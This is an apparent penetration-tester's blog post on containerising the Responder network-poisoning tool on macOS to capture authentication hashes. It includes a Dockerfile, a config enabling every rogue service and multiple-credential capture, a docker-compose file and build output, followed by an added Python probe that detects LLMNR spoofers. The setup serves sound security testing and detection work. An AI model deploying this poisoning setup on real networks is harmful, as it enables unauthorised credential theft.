Responder on Docker Container

ismail kaleem
Mar 30, 2024

Pwning hashes with macOS as the host, using Docker without the --host or --privileged flag. Since the host is already running multicast on 5353, we use host port 5454 mapped to container port 5353.

Dockerfile

FROM alpine:latest

# Install dependencies
RUN apk update && apk add --no-cache \
    git \
    python3 \
    py3-pip \
    py3-requests \
    py3-beautifulsoup4 \
    py3-ldap3 \
    py3-cryptography \
    py3-pycryptodomex \
    py3-virtualenv \
    gcc \
    musl-dev \
    python3-dev \
    libffi-dev

# Clone Responder repository
RUN git clone https://github.com/lgandx/Responder.git /opt/Responder

# Set the working directory
WORKDIR /opt/Responder

# Create a virtual environment and activate it
RUN python3 -m venv venv
ENV PATH="/opt/Responder/venv/bin:$PATH"

# Install remaining Python dependencies using pip inside the virtual environment
RUN pip3 install --no-cache-dir \
    netifaces \
    pyopenssl \
    pyasn1 \
    dnslib

Responder.conf

[Responder Core]

; Servers to start
SQL = On
SMB = On
RDP = On
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = On
HTTPS = On
DNS = On
LDAP = On
DCERPC = On
WINRM = On
SNMP = Off
MQTT = Off
; Custom challenge.
; Use "Random" for generating a random challenge for each requests (Default)
Challenge = Random

; SQLite Database file
; Delete this file to re-capture previously captured hashes
Database = Responder.db

; Default log file
SessionLog = Responder-Session.log

; Poisoners log
PoisonersLog = Poisoners-Session.log

; Analyze mode log
AnalyzeLog = Analyzer-Session.log

; Dump Responder Config log:
ResponderConfigDump = Config-Responder.log

; Specific IP Addresses to respond to (default = All)
; Example: RespondTo = 10.20.1.100-150, 10.20.3.10
RespondTo =


#Bind_To = 172.25.0.2
; Specific NBT-NS/LLMNR names to respond to (default = All)
; Example: RespondTo = WPAD, DEV, PROD, SQLINT
;RespondToName = WPAD, DEV, PROD, SQLINT
RespondToName =

; Specific IP Addresses not to respond to (default = None)
; Example: DontRespondTo = 10.20.1.100-150, 10.20.3.10
DontRespondTo =

; Specific NBT-NS/LLMNR names not to respond to (default = None)
; Example: DontRespondTo = NAC, IPS, IDS
DontRespondToName = ISATAP

; If set to On, we will stop answering further requests from a host
; if a hash has been previously captured for this host.
AutoIgnoreAfterSuccess = Off

; If set to On, we will send ACCOUNT_DISABLED when the client tries
; to authenticate for the first time to try to get different credentials.
; This may break file serving and is useful only for hash capture
CaptureMultipleCredentials = On

; If set to On, we will write to file all hashes captured from the same host.
; In this case, Responder will log from 172.16.0.12 all user hashes: domain\toto,
; domain\popo, domain\zozo. Recommended value: On, capture everything.
CaptureMultipleHashFromSameHost = On

[HTTP Server]

; Set to On to always serve the custom EXE
Serve-Always = Off

; Set to On to replace any requested .exe with the custom EXE
Serve-Exe = Off

; Set to On to serve the custom HTML if the URL does not contain .exe
; Set to Off to inject the 'HTMLToInject' in web pages instead
Serve-Html = Off

; Custom HTML to serve
HtmlFilename = files/AccessDenied.html

; Custom EXE File to serve
ExeFilename = ;files/filetoserve.exe

; Name of the downloaded .exe that the client will see
ExeDownloadName = ProxyClient.exe

; Custom WPAD Script
; Only set one if you really know what you're doing. Responder is taking care of that and inject the right one, with your current IP address.
WPADScript =

; HTML answer to inject in HTTP responses (before </body> tag).
; leave empty if you want to use the default one (redirect to SMB on your IP address).
HTMLToInject =

[HTTPS Server]

; Configure SSL Certificates to use
SSLCert = certs/responder.crt
SSLKey = certs/responder.key

docker-compose.yml

version: '3'

services:

  responder:
    build: .
    volumes:
      - ./Responder.conf:/opt/Responder/Responder.conf
      - ./logs:/opt/Responder/logs
    ports:
      - "80:80"
      - "443:443"
      - "137:137"
      - "138:138"
      - "139:139"
      - "445:445"
      - "389:389"
      - "3268:3268"
      - "88:88"
      - "464:464"
      - "53:53"
      - "135:135"
      - "1433:1433"
      - "3389:3389"
      - "21:21"
      - "110:110"
      - "143:143"
      - "25:25"
      - "5985:5985"
      - "5986:5986"
      - "547:547"
      # Host 5454 -> container 5353: host port 5353 is already in use by the macOS multicast service
      - "5454:5353"
      - "5355:5355"
      - "3260:3260"
      - "5060:5060"
      - "5061:5061"
    # Updated command to use the correct options
    command: python3 Responder.py -I eth0 -w -d
    networks:
      - responder_network

networks:
  responder_network:
    driver: bridge

Fire up build

docker-compose up --build

[+] Building 1.0s (10/10) FINISHED docker:desktop-linux
=> [responder internal] load build definition from Dockerfile 0.0s
=> => transferring dockerfile: 782B 0.0s
=> [responder internal] load metadata for docker.io/library/alpine:lates 0.9s
=> [responder internal] load .dockerignore 0.0s
=> => transferring context: 2B 0.0s
=> [responder 1/6] FROM docker.io/library/alpine:latest@sha256:c5b1261d6 0.0s
=> CACHED [responder 2/6] RUN apk update && apk add --no-cache git 0.0s
=> CACHED [responder 3/6] RUN git clone https://github.com/lgandx/Respon 0.0s
=> CACHED [responder 4/6] WORKDIR /opt/Responder 0.0s
=> CACHED [responder 5/6] RUN python3 -m venv venv 0.0s
=> CACHED [responder 6/6] RUN pip3 install --no-cache-dir netifaces 0.0s
=> [responder] exporting to image 0.0s
=> => exporting layers 0.0s
=> => writing image sha256:9c3e54196093c0ba05d17a43bd898fd1c9aae2e7af95a 0.0s
=> => naming to docker.io/library/tmp-responder 0.0s
[+] Running 1/0
✔ Container tmp-responder-1 Recreated 0.0s
Attaching to responder-1

To view the logs

cat ./logs/*.log
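
The defender's counterpart to this setup, as an added example that is not part of the original post or of Responder: with RespondToName left empty the poisoner answers every LLMNR name, so a query for a random name that no host owns should get no reply on a clean segment. The canary name prefix and the function names are assumptions made for illustration.

```python
import secrets, socket, struct

LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355  # RFC 4795 IPv4 multicast

def build_query(name, txid):
    """LLMNR query: DNS-style header plus one A/IN question."""
    label = name.encode("ascii")
    return (struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)
            + bytes([len(label)]) + label + b"\x00" + struct.pack("!HH", 1, 1))

def skip_name(pkt, off):
    """Return the offset just past a name (labels or compression pointer)."""
    while pkt[off] and pkt[off] & 0xC0 != 0xC0:
        off += 1 + pkt[off]
    return off + (2 if pkt[off] else 1)

def parse_answer(pkt, txid):
    """Return the IPv4 address a response to txid claims, else None."""
    try:
        rid, flags, qd, an = struct.unpack("!HHHH", pkt[:8])
        if rid != txid or not flags & 0x8000 or an == 0:
            return None
        off = 12
        for _ in range(qd):
            off = skip_name(pkt, off) + 4      # name + QTYPE + QCLASS
        off = skip_name(pkt, off)
        rtype, _, _, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
        rdata = pkt[off + 10:off + 10 + rdlen]
    except (IndexError, struct.error):         # truncated or malformed packet
        return None
    return socket.inet_ntoa(rdata) if rtype == 1 and len(rdata) == 4 else None

def probe(timeout=2.0):
    """Query a random name no host owns; every answer marks a spoofer."""
    name, txid = "canary-" + secrets.token_hex(6), secrets.randbelow(0x10000)
    hits = []
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_query(name, txid), (LLMNR_GROUP, LLMNR_PORT))
        try:
            while True:
                pkt, (src, _) = s.recvfrom(512)
                if parse_answer(pkt, txid):
                    hits.append(src)           # source address of the answering host
        except socket.timeout:
            return name, hits

if __name__ == "__main__":
    print(probe())
```

Run it from a host on the segment being monitored; a non-empty hits list holds the source addresses that answered for the canary name.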
